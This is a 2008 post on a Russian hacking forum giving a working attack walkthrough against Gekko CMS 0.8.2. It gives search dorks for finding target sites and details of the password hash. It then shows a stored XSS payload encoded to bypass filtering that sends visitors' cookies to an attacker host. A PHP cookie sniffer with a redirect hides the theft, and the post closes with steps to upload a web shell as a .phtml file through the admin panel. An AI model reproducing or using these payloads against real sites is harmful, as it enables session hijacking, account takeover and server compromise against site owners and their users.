[ Обзор уязвимостей Gekko CMS ]

[ Обзор уязвимостей Gekko CMS ]

03.02.2008, 20:09

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

[ Обзор уязвимостей Gekko CMS ]

Gekko CMS

gekko-portal-0.8.2

[Общая информация]

Офф сайт: http://www.gekkoware.ru/
Для поиска сайтов с такой цмс вводим: "Powered by Gekko" или "© 2008 example.org"
Стандартный префикс для таблиц: gekkocms_
Таблица с пользователями: user
Колонки с данными для авторизации: username и password
Пароль хешируется, алгоритм хеширования: md5($username.$password)

[Активная XSS]

Из-за недостаточной фильтрации (фильтрация хоть и есть, но еще сырая) можно в разрешенные теги вписать скрипт.

Проверял на форуме при создание/ответе на тему содержание поста - код скрипта:

Код:

<a href="javascript:alert(document.cookie);">text</a> - таким образом при нажатии на ссылку выполнится код (в данном случае алерт)

Одинарные кавычки фильтруются (ровно как и двойные (кстати постить нужно именно в них)), но это легко обойти:

Код:

Кодируем alert('xss'); -> (кодируем) -> &#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#39&#41&#59

Получаем:

Код:

<a href="javascript:&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#39&#41&#59">text</a>

Алерт алертом, но лучше стырить куки.
Можно сделать к примеру что бы при нажатии на ссылку пользователь переходил на снифер и оставлял там куки:

Код:

document.location.replace('http://test2/q.php?q='+document.cookie); -> (кодируем) -> &#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#114&#101&#112&#108&#97&#99&#101&#40&#39&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#50&#47&#113&#46&#112&#104&#112&#63&#113&#61&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41&#59

Получаем:

Код:

<a href="javascript:&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#46&#114&#101&#112&#108&#97&#99&#101&#40&#39&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#50&#47&#113&#46&#112&#104&#112&#63&#113&#61&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#41&#59">text</a>

По адресу http://test2/q.php?q= должен лежать наш снифер, который будет отлавливать куки:

PHP код:


		
			
<?php



$file = fopen('log.txt','a');

fputs($file, $_GET['q']."\r\n");

fclose($file);



?>

Что бы меньше палиться можно поставить редирет на какой нидь сайт:

PHP код:


		
			
<?php



$file = fopen('log.txt','a');

fputs($file, $_GET['q']."\r\n");

fclose($file);



header("Location: http://ya.ru");



?>

Таким образом пользователь при переходе по ссылке попадет на снифер, оставит там свои куки и будет перемещен на какой нидь сайт.

К сожалению в куках лежит индетификатор сессии, а это значит что пользоваться этими куками мы сможет пока пользователь не выйдет с сайта (т.е. его куки не будут удалены).
Но с другой стороны что бы попасть в админку вводить пароль не требуется, а это нам на руку.

====================================

Для кодирования вашего скрипта используйте сайт: http://ha.ckers.org/xss.html

Так же советую прочитать статью: Темная сторона Xss - вней вы найдете други способы использования xss.

[Заливка шелла]

Если вы успешно пробрались в админку, то залить шелл уже не проблема:

В админке переходим в 'Файлы' и заливаем файл, единственное но это то что расширение файла не может быть .php, но это уже не так страшно, подойжут любые из расширений: php3, phtml вообщем не важно какое главное что бы у аппача оно ассоциировалось с php.

Все шелл будет доступен по адресу:

http://site.ru/data/files/shell.phtml

(с) Grey

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Grey; 03.02.2008 в 20:44..